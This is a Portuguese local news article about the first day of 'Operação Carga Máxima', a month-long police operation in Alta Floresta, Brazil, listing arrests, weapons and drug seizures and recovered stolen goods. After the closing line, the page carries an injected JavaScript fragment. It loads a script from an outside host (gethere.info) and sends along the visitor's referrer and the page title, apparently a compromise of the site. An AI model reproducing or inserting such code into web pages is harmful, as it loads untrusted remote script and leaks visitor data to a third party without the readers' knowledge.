Capa / Em Destaque / Operação carga máxima tem resultado positivo no primeiro dia e terá duração de 30 dias

Operação carga máxima tem resultado positivo no primeiro dia e terá duração de 30 dias

KODAK Digital Still CameraA operação “Carga Máxima” deflagrada ontem quinta-feira (28) em Alta Floresta e região segundo a coronel Maria do Carmo de Roma comandante em exercício do 9º Comando Regional de Policia Militar de Alta Floresta a operação já no primeiro dia mostrou resultados positivos, ocorrerá no período mínimo de 30 dias. Para a escolha dos pontos iniciais da ação foi feita uma seleção, “foi pontuado os locais de maior incidência criminal e ontem pela manhã a policia civil, juntamente com a Policia Militar e outros órgãos de segurança, iniciou varias ações dentro de alta floresta, então nós tivemos ai um êxito grande nas ações da polícia civil, nas ações da policia militar, nas ações do corpo de bombeiros e nas ações dos agentes da prefeitura municipal”, destacou.

O objetivo da operação é reduzir a criminalidade no Estado empregando todo o efetivo operacional das Polícias Militar e Judiciária Civil, em Alta Floresta e região até a manhã desta sexta feira foram realizadas 12 apreensões de veículos em medida administrativa, apreensão de 50m³ de madeira irregular, 10 veículos recuperados, a apreensão de 11 armas de fogo e 77 munições, 509 gramas de drogas lícitas, cinco mandatos de prisão cumpridos, 29 de busca e apreensão cumpridos, 38 prisões e detenções, 02 menores apreendidos e 24 flagrantes registrados.

Segundo a coronel da polícia militar de Alta Floresta são mais de 15 homens atuando diariamente na operação, além disso, investigadores da Polícia Civil, Corpo de Bombeiros e Agentes de Trânsito reforçam o combate a criminalidade.

Durante a operação a Polícia também apreendeu uma moto utilizada em assaltos na região, segundo o delegado de Polícia Civil Rodrigo Bastos dois menores que cometiam crimes na região “esses menores vinham cometendo crimes na região e como a gente sabe o crime ele migra de um lado para o outro por isso essas operações não vão ocorrer apenas no município de Alta Floresta e esses dados são de ações feitas em conjunto por fora do município”, destacou.

Foram apreendidos também cerca de 300 mil reais em defensivos agrícolas roubado de fazendas em Vera, Santa Carmem e Matupá.

Mais informações na edição de segunda-feira (01) do jornal O Diário.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Sobre Kariny Santos

Deixe uma resposta

O seu endereço de email não será publicado. Required fields are marked *

*

Scroll To Top